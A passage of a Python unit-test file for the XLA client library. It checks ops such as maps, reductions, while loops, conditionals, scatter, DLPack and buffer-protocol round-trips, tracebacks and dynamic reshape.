"dtype": dtype,
} for dtype in float_dtypes)
def testRegularizedIncompleteBeta(self, dtype):
x = np.array([0.53787335, 0.24015466, 0.47494545, 0.13567594, 0.95114538],
dtype=dtype)
a = np.array([0.00753073, 0.34813385, 0.30485708, 1.29298632, 0.51472606],
dtype=dtype)
b = np.array([0.55688389, 0.59794214, 0.42661022, 1.59748339, 0.95047677],
dtype=dtype)
c = self._NewComputation()
ops.RegularizedIncompleteBeta(
ops.Constant(c, a), ops.Constant(c, b), ops.Constant(c, x))
expected = np.array(
[0.98923271, 0.48575411, 0.57952568, 0.12579775, 0.96989155])
self._ExecuteAndCompareClose(c, expected=[expected], rtol=2e-2)
tests.append(SingleOpTest)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantComputation(self, in_dtype, out_dtype):
"""Computation (A) -> B that returns a constant 1 for any input."""
c = self._NewComputation("constant_{}_{}_one".format(
in_dtype.__name__, out_dtype.__name__))
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=in_dtype)).with_major_to_minor_layout_if_absent())
ops.Constant(c, out_dtype(1))
return c.build()
def _CreateMulBy2Computation(self, dtype):
"""Computation (dtype) -> dtype that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
ops.Mul(
ops.Parameter(
c, 0,
xla_client.shape_from_pyval(np.array(
0, dtype=dtype)).with_major_to_minor_layout_if_absent()),
ops.Constant(c, dtype(2.0)))
return c.build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
ops.Mul(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0))))
return c.build()
def _CreateBinaryAddComputation(self, dtype):
"""Computation (dtype, dtype) -> dtype that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Add(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _CreateBinaryGeComputation(self, dtype):
"""Computation (dtype, dtype) -> bool that tests param0 >= param1."""
c = self._NewComputation("param0_ge_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
shape = shape.with_major_to_minor_layout_if_absent()
ops.Ge(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
def _MakeSample3DArray(self, dtype):
return np.array([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]],
dtype=dtype)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testCall(self, dtype):
c = self._NewComputation()
ops.Call(
c,
self._CreateMulBy2Computation(dtype),
operands=(ops.Constant(c, dtype(5.0)),))
self._ExecuteAndCompareClose(c, expected=[10.0])
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(in_dtype.__name__, out_dtype.__name__),
"in_dtype": in_dtype,
"out_dtype": out_dtype,
} for in_dtype, out_dtype in [[np.float32, np.int32]])
def testMapEachElementToConstant(self, in_dtype, out_dtype):
c = self._NewComputation()
ops.Map(c,
[ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=in_dtype))],
self._CreateConstantComputation(in_dtype, out_dtype), [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1, 1, 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testMapMulBy2(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
ops.Map(c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 4.0, 6.0, 8.0]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSimpleMapChain(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
# Chains a map of constant-out with a map of mul-by-2
c = self._NewComputation()
const = ops.Map(
c, [ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))],
self._CreateConstantComputation(dtype, dtype), [0])
ops.Map(c, [const], self._CreateMulBy2Computation(dtype), [0])
self._ExecuteAndCompareClose(c, expected=[[2.0, 2.0, 2.0, 2.0]])
# TODO(b/154752816): bfloat16 crashes in evaluator.
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testDivVectorsWithMap(self, dtype):
def DivComputation():
c = self._NewComputation("div_param0_by_param1")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Div(ops.Parameter(c, 0, shape), ops.Parameter(c, 1, shape))
return c.build()
c = self._NewComputation()
ops.Map(c, (ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype)),
ops.Constant(c, np.array([5.0, 5.0, 4.0, 4.0], dtype=dtype))),
DivComputation(), [0])
self._ExecuteAndCompareClose(
c, expected=[[0.2, 0.4, 0.75, 1.0]], rtol=1e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSelectAndScatter(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
operand = ops.Constant(
c, np.array([[1., 2., 6.], [4., 5., 3.]], dtype=dtype))
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID,
c.get_shape(operand).dimensions(), window_dimensions, window_strides)
ops.SelectAndScatterWithGeneralPadding(
operand,
select=self._CreateBinaryGeComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
padding=padding,
source=ops.Constant(c, np.array([[0.1, 0.2]], dtype=dtype)),
init_value=ops.Constant(c, np.array(1, dtype=dtype)),
scatter=self._CreateBinaryAddComputation(dtype))
self._ExecuteAndCompareClose(
c, expected=[[[1., 1., 1.2], [1.1, 1., 1.]]], rtol=5e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduce1DtoScalar(self, dtype):
c = self._NewComputation()
ops.Reduce(
c,
operands=[
ops.Constant(c, np.array([1.0, 2.0, 3.0, 4.0], dtype=dtype))
],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[0])
self._ExecuteAndCompareClose(c, expected=[10])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}_dim{}".format(dtype.__name__, dim),
"dtype": dtype,
"dim": dim,
} for dtype in float_dtypes if dtype != bfloat16 for dim in range(2))
def testReduce2DTo1D(self, dtype, dim):
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=[dim])
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dim)])
@parameterized.named_parameters({
"testcase_name": "_{}_dims[{}]".format(dtype.__name__, dims),
"dtype": dtype,
"dims": tuple(dims)
} for dtype in float_dtypes for dims in itertools.permutations(range(3)))
def testReduce3DAllPossibleWaysF32(self, dtype, dims):
input_array = self._MakeSample3DArray(dtype)
c = self._NewComputation()
ops.Reduce(
c,
operands=[ops.Constant(c, input_array)],
init_values=[ops.Constant(c, dtype(0))],
computation=self._CreateBinaryAddComputation(dtype),
dimensions_to_reduce=dims)
self._ExecuteAndCompareClose(c, expected=[np.sum(input_array, axis=dims)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.]]])
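# Note (added for clarity): with a (2, 1) window, unit strides and VALID
# padding, each output element is a column sum of the 2x3 input:
# 1+4=5, 2+5=7, 3+6=9, which gives the expected [[5., 7., 9.]].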
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowSameUnitStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.SAME, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 7., 9.], [4., 5., 6.]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testReduceWindowValidGeneralStrides(self, dtype):
if dtype == np.float64 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support float64")
input_array = np.array([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]], dtype=dtype)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 2)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, input_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operand=ops.Constant(c, input_array),
init_value=ops.Constant(c, dtype(0)),
computation=self._CreateBinaryAddComputation(dtype),
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[5., 9.]]])
def testReduceWindowVariadic(self):
c = self._NewComputation("reducer")
shape = xla_client.shape_from_pyval(np.array(0, dtype=np.int32))
shape = shape.with_major_to_minor_layout_if_absent()
ps = [ops.Parameter(c, i, shape) for i in range(4)]
which = ops.Ge(ps[0], ps[2])
ops.Tuple(
c, [ops.Select(which, ps[0], ps[2]),
ops.Select(which, ps[1], ps[3])])
reducer = c.build()
key_array = np.array([[1, 5, 6], [4, 2, 3]], dtype=np.int32)
val_array = np.array([[7, 8, 9], [10, 11, 12]], dtype=np.int32)
c = self._NewComputation()
window_dimensions = (2, 1)
window_strides = (1, 1)
padding = xla_client.window_padding_type_to_pad_values(
xla_client.PaddingType.VALID, key_array.shape, window_dimensions,
window_strides)
ops.ReduceWindowWithGeneralPadding(
operands=[ops.Constant(c, key_array),
ops.Constant(c, val_array)],
init_values=[
ops.Constant(c, np.int32(0)),
ops.Constant(c, np.int32(0))
],
computation=reducer,
window_dimensions=window_dimensions,
window_strides=window_strides,
base_dilations=[],
window_dilations=[],
padding=padding)
self._ExecuteAndCompareClose(c, expected=[[[4, 5, 6]], [[10, 8, 9]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testWhile(self, dtype):
def LessThan10Cond():
c = self._NewComputation("test_lt_10")
shape = xla_client.shape_from_pyval(np.array(0, dtype=dtype))
ops.Lt(ops.Parameter(c, 0, shape), ops.Constant(c, dtype(10.)))
return c.build()
cond = LessThan10Cond()
body = self._CreateMulBy2Computation(dtype)
c = self._NewComputation()
init = ops.Constant(c, dtype(1.))
ops.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=[16.])
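# Note (added for clarity): starting from 1.0, the body doubles the value
# while it is less than 10: 1 -> 2 -> 4 -> 8 -> 16 (8 < 10 triggers one
# final doubling), so the loop exits with 16.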
def testConditionalTrue(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(True))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[6.])
def testConditionalFalse(self):
c = self._NewComputation()
pred = ops.Constant(c, np.bool_(False))
true_operand = ops.Constant(c, np.float32(3.))
true_computation = self._CreateMulBy2Computation(np.float32)
false_operand = ops.Constant(c, np.float32(2.))
false_computation = self._CreateConstantComputation(
np.float32, np.float32)
ops.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=[1.])
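# Note (added for clarity): with pred=False the false computation runs, and
# it returns a constant 1 regardless of its operand (2.0), hence the
# expected result of 1 rather than 2.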
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed[0]).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for item in to_infeed:
device.transfer_to_infeed(item)
for item in to_infeed:
result, = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertEqual(result, item)
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedTuple(self):
to_infeed = (NumpyArrayS32([1, 2, 3, 4]), NumpyArrayS32([[7], [8]]))
c = self._NewComputation()
ops.GetTupleElement(
ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_infeed).with_major_to_minor_layout_if_absent()), 0)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
device.transfer_to_infeed(to_infeed)
result = xla_client.execute_with_python_values(
compiled_c, (), backend=self.backend)
self.assertLen(result, 2)
np.testing.assert_equal(result[0], to_infeed[0])
np.testing.assert_equal(result[1], to_infeed[1])
@unittest.skipIf(cloud_tpu, "not implemented")
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x_and_token = ops.InfeedWithToken(
ops.CreateToken(c),
xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent())
x = ops.GetTupleElement(x_and_token, 0)
token = ops.GetTupleElement(x_and_token, 1)
outfeed_shape = xla_client.shape_from_pyval(
to_round_trip[0]).with_major_to_minor_layout_if_absent()
ops.OutfeedWithToken(x, token, outfeed_shape)
compiled_c = self.backend.compile(c.build())
device = self.backend.local_devices()[0]
for want in to_round_trip:
execution = threading.Thread(target=lambda: compiled_c.execute([]))
execution.start()
device.transfer_to_infeed(want)
got = device.transfer_from_outfeed(outfeed_shape)
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
ops.Scatter(
ops.Constant(c, a), ops.Constant(c, scatter_indices),
ops.Constant(c, updates), self._CreateBinaryAddComputation(np.int32),
dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]],
dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=[expected])
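# Note (added for clarity): a == [[0, 1, 2], [3, 4, 5], [6, 7, 8]]; the
# add-combining scatter adds the update rows into rows 0 and 2 of `a`,
# leaving row 1 unchanged.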
class DeviceTest(ComputationTest):
def testPlatform(self):
for device in self.backend.local_devices():
self.assertEqual(device.platform, self.backend.platform)
tests.append(DeviceTest)
class ErrorTest(ComputationTest):
def setUp(self):
super(ErrorTest, self).setUp()
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testCompileWithWrongElementTypeInLayout(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
options = xla_client.CompileOptions()
options.argument_layouts = [
xla_client.Shape.array_shape(np.dtype(np.float32), [])
]
def TestFun():
return self.backend.compile(c.build(), compile_options=options)
self.assertRaisesRegex(
RuntimeError, r".*Invalid argument shape.*"
r"expected s32\[\], got f32\[\].*", TestFun)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.set_op_metadata(xla_client.CurrentSourceInfoMetadata())
ops.Parameter(c, 0, xla_client.shape_from_pyval(self.s32_scalar_2))
c.clear_op_metadata()
def TestFun():
return xla_client.execute_with_python_values(
self.backend.compile(c.build()), [self.f32_scalar_2], self.backend)
self.assertRaisesRegex(
RuntimeError, r"Invalid argument: Argument does not match.*"
r"want s32\[\], got f32\[\].*", TestFun)
tests.append(EmbeddedComputationsTest)
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(ComputationRootTest)
class SetShardingTest(ComputationTest):
"""Tests related to set OpSharding."""
def testSetSharding(self):
c = self._NewComputation()
sharding = xla_client.OpSharding()
sharding.type = xla_client.OpSharding.Type.REPLICATED
sharding.tile_assignment_dimensions = [1]
sharding.tile_assignment_devices = [0]
c.set_sharding(sharding)
x = ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(2.0)))
c.clear_sharding()
result = ops.Add(x, ops.Constant(c, np.float32(3.14)))
ops.Add(result, ops.Constant(c, np.float32(1.618)))
arg = NumpyArrayF32(1.0)
compiled_c = self.backend.compile(c.build(result))
ans, = xla_client.execute_with_python_values(
compiled_c, [arg], backend=self.backend)
np.testing.assert_allclose(ans, 4.14)
tests.append(SetShardingTest)
testcase_shapes = [
(),
(1,),
(2, 3),
(2, 0),
(0, 7),
(4, 1, 2),
(2, 1, 3),
(2, 4, 1),
(3, 1),
(1, 3),
]
def FormatShapeAndDtype(shape, dtype):
return "_{}[{}]".format(np.dtype(dtype).name, ",".join(map(str, shape)))
class DLPackTest(parameterized.TestCase):
def setUp(self):
super(DLPackTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform not in ("cpu", "gpu"):
self.skipTest("DLPack requires CPU or GPU")
self.cpu_backend = (
self.backend
if self.backend.platform == "cpu" else xla_client.make_cpu_client())
self.gpu_backend = (
self.backend if self.backend.platform == "gpu" else None)
# pylint: disable=g-complex-comprehension
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "{}_own={}_gpu={}".format(
FormatShapeAndDtype(shape, dtype), take_ownership, gpu),
"dtype": dtype,
"shape": shape,
"take_ownership": take_ownership,
"gpu": gpu
} for dtype in dlpack_dtypes for shape in testcase_shapes
for take_ownership in [False, True]
for gpu in [False, True])
# pyformat: enable
def testRoundTrip(self, dtype, shape, take_ownership, gpu):
if gpu and self.gpu_backend is None:
raise unittest.SkipTest("Test not running with GPU support")
backend = self.gpu_backend if gpu else self.cpu_backend
if dtype == np.bool_:
x = np.random.randint(0, 2, size=shape).astype(np.bool_)
else:
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
buffer = backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=take_ownership)
del buffer # Free "buffer" to make sure dlt retains ownership.
self.assertEqual(type(dlt).__name__, "PyCapsule")
y = xla_client._xla.dlpack_managed_tensor_to_buffer(
dlt, self.cpu_backend, self.gpu_backend)
np.testing.assert_array_equal(
x.astype(np.uint8) if dtype == np.bool_ else x, y.to_py())
def testTensorsCanBeConsumedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
dlt = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def ConsumeDLPackTensor():
_ = xla_client._xla.dlpack_managed_tensor_to_buffer(dlt, self.backend)
ConsumeDLPackTensor()
self.assertRaisesRegex(
RuntimeError, ".*a DLPack tensor may be consumed at most once.*",
ConsumeDLPackTensor)
def testTensorsCanBeOwnedOnceOnly(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
self.assertTrue(buffer.is_deleted())
with self.assertRaisesRegex(
RuntimeError,
"Cannot convert deleted/invalid buffer to DLPack tensor.*"):
_ = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=True)
def testNonOwnedDlpackCanBeViewedTwice(self):
x = np.array(np.random.rand(3, 4, 5, 6), dtype=np.float32)
buffer = self.backend.buffer_from_pyval(x)
d1 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
d2 = xla_client._xla.buffer_to_dlpack_managed_tensor(
buffer, take_ownership=False)
y = xla_client._xla.dlpack_managed_tensor_to_buffer(d1, self.backend)
z = xla_client._xla.dlpack_managed_tensor_to_buffer(d2, self.backend)
del d1, d2
np.testing.assert_array_equal(x, buffer.to_py())
np.testing.assert_array_equal(x, y.to_py())
np.testing.assert_array_equal(x, z.to_py())
tests.append(DLPackTest)
class BufferProtocolTest(parameterized.TestCase):
def setUp(self):
super(BufferProtocolTest, self).setUp()
self.backend = xla_backend()
if self.backend.platform != "cpu":
self.skipTest("Test requires CPU")
# pylint: disable=g-complex-comprehension
@parameterized.named_parameters({
"testcase_name": FormatShapeAndDtype(shape, dtype),
"dtype": dtype,
"shape": shape
} for dtype in standard_dtypes if dtype != bfloat16
for shape in testcase_shapes)
def testRoundTrip(self, dtype, shape):
x = np.array(np.random.rand(*shape) * 100, dtype=dtype)
x_ptr = x.__array_interface__["data"][0]
buffer = self.backend.buffer_from_pyval(
x, host_buffer_semantics=xla_client.HostBufferSemantics.ZERO_COPY)
y = np.array(buffer, copy=False)
y_ptr = y.__array_interface__["data"][0]
np.testing.assert_array_equal(x, y)
# If the input was sufficiently aligned, the input and output should
# alias.
self.assertTrue((x_ptr & 15) != 0 or x_ptr == y_ptr)
self.assertEqual(y_ptr, buffer.unsafe_buffer_pointer())
during_call = xla_client.HostBufferSemantics.IMMUTABLE_ONLY_DURING_CALL
buffer2 = self.backend.buffer_from_pyval(
x, host_buffer_semantics=during_call)
z = np.array(buffer2, copy=False)
self.assertNotEqual(x.__array_interface__["data"][0],
z.__array_interface__["data"][0])
def testDeleteWithActiveView(self):
x = np.random.randn(20, 10)
buffer = self.backend.buffer_from_pyval(x)
buffer_ptr = buffer.unsafe_buffer_pointer()
y = np.array(buffer, copy=False)
buffer.delete()
# It is still legal to access `y`; the array view must keep it alive.
np.testing.assert_array_equal(x, y)
self.assertEqual(y.__array_interface__["data"][0], buffer_ptr)
tests.append(BufferProtocolTest)
class TracebackTest(absltest.TestCase):
def setUp(self):
super(TracebackTest, self).setUp()
self.backend = xla_backend()
def testNoTracebacksIfDisabled(self):
with xla_client.tracebacks(enabled=False):
self.assertEqual(None, xla_client.Traceback.get_traceback())
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertEqual(None, buffer.traceback)
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertEqual(None, e.traceback)
def assertIsTracebackContaining(self, tb, function):
self.assertIsInstance(tb, xla_client.Traceback)
self.assertIn(function, str(tb))
self.assertTrue(any(f.function_name == function for f in tb.frames))
def testTracebacks(self):
with xla_client.tracebacks(enabled=True):
tb = xla_client.Traceback.get_traceback()
self.assertIsTracebackContaining(tb, "testTracebacks")
# Tracebacks are not implemented on the TPU driver extension's variant
# of buffers and executables.
if not isinstance(self.backend, xla_client.Client):
return
buffer = self.backend.buffer_from_pyval(np.array(7, np.int32))
self.assertIsTracebackContaining(buffer.traceback, "testTracebacks")
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
e = self.backend.compile(b.build())
self.assertIsTracebackContaining(e.traceback, "testTracebacks")
def testNestedFunction(self):
def AFunction():
def AnotherFunction():
return xla_client.Traceback.get_traceback()
return AnotherFunction()
with xla_client.tracebacks(enabled=True):
tb = AFunction()
self.assertIsInstance(tb, xla_client.Traceback)
frames = tb.frames
i = next(
i for (i, f) in enumerate(frames) if f.function_name == "AFunction")
self.assertEqual(frames[i - 1].function_name, "AnotherFunction")
self.assertEqual(frames[i + 1].function_name, "testNestedFunction")
tests.append(TracebackTest)
class ClientTest(ComputationTest):
def setUp(self):
super(ClientTest, self).setUp()
self.backend = xla_backend()
def testPlatformVersion(self):
version = self.backend.platform_version
logging.info("platform_version:\n%s", version)
if self.backend.platform == "cpu":
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "gpu":
# The following is false if not built with --config=cuda.
if test_util.is_gpu_available(cuda_only=True):
self.assertTrue(
re.match(r"^cuda \d{4,}$", version),
msg=f"Expected CUDA version string; got {repr(version)}")
else:
self.assertEqual(version, "<unknown>")
elif self.backend.platform == "tpu" and not cloud_tpu:
self.assertIn("tpu", version.lower())
self.assertIn("cl/", version)
@unittest.skipIf(cloud_tpu or tfrt_tpu, "not implemented")
def testExecutableSerialization(self):
if self.backend.platform != "tpu":
self.skipTest("Test requires tpu platform")
c = self._NewComputation()
ops.Add(
ops.Constant(c, NumpyArrayS32([1, 2])),
ops.Constant(c, NumpyArrayS32([3, 4])))
options = xla_client.CompileOptions()
executable = self.backend.compile(c.build(), options)
self.assertLen(executable.hlo_modules(), 1)
serialized = self.backend.serialize_executable(executable)
deserialized = self.backend.deserialize_executable(
serialized,
executable.hlo_modules()[0], options)
expected, = xla_client.execute_with_python_values(executable, (),
self.backend)
actual, = xla_client.execute_with_python_values(deserialized, (),
self.backend)
self.assertTrue(np.all(actual == expected))
tests.append(ClientTest)
# TODO(b/182461453): Add TFRT and cloud TPU implementation of
# ReadDynamicShapes
class DynamicReshapeTest(ComputationTest):
"""Tests related to DynamicReshape."""
def _CompareToPyAndBufferProtocol(self, builder, args, expected_results,
test_fn):
compiled = self.backend.compile(builder.build())
output_buffers = compiled.execute([
self.backend.buffer_from_pyval(
arg, device=compiled.local_devices()[0]) for arg in args
])
self.assertLen(output_buffers, len(expected_results))
for buf, expected in zip(output_buffers, expected_results):
to_py_result = buf.to_py()
self.assertEqual(expected.shape, to_py_result.shape)
test_fn(expected, to_py_result)
if self.backend.platform == "cpu" and buf.dtype != bfloat16:
mview = memoryview(buf)
self.assertEqual(expected.shape, mview.shape)
test_fn(expected, np.asarray(mview))
else:
# The buffer protocol is expected to fail on non-CPU platforms and bfloat16.
# Note that np.asarray(buf) doesn't throw an exception. To test if the
# error was thrown properly we must use memoryview(buf).
with self.assertRaises(BufferError):
memoryview(buf)
# 1D reshape of full size, half size, and size of 0.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.parameters((5), (3), (0))
def testReshape1D(self, reshape_size):
full_size = 5
c = self._NewComputation()
arg = np.array(reshape_size, dtype=np.int32)
expected = np.array(range(reshape_size), dtype=np.int32)
p = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg))
ops.DynamicReshape(
ops.Constant(c, NumpyArrayS32(range(full_size))), [p], [full_size],
[True])
self._CompareToPyAndBufferProtocol(c, [arg], [expected],
np.testing.assert_equal)
# 2D reshape with a slice on the minor dimension. We test different types
# where the strides may differ between the host and devices. The reshaped
# physical memory layout is not consecutive, and we test if the program can
# return the correct logical view of the data.
@unittest.skipIf(cloud_tpu or tfrt_tpu or external_tpu, "not implemented")
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testReshape2D(self, dtype):
arg0 = np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)
arg1 = np.array(2, dtype=np.int32)
expected = np.array([[1, 2], [4, 5]], dtype=np.int32)
c = self._NewComputation()
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.DynamicReshape(p0, [p1, p1], [2, 3], [False, True])
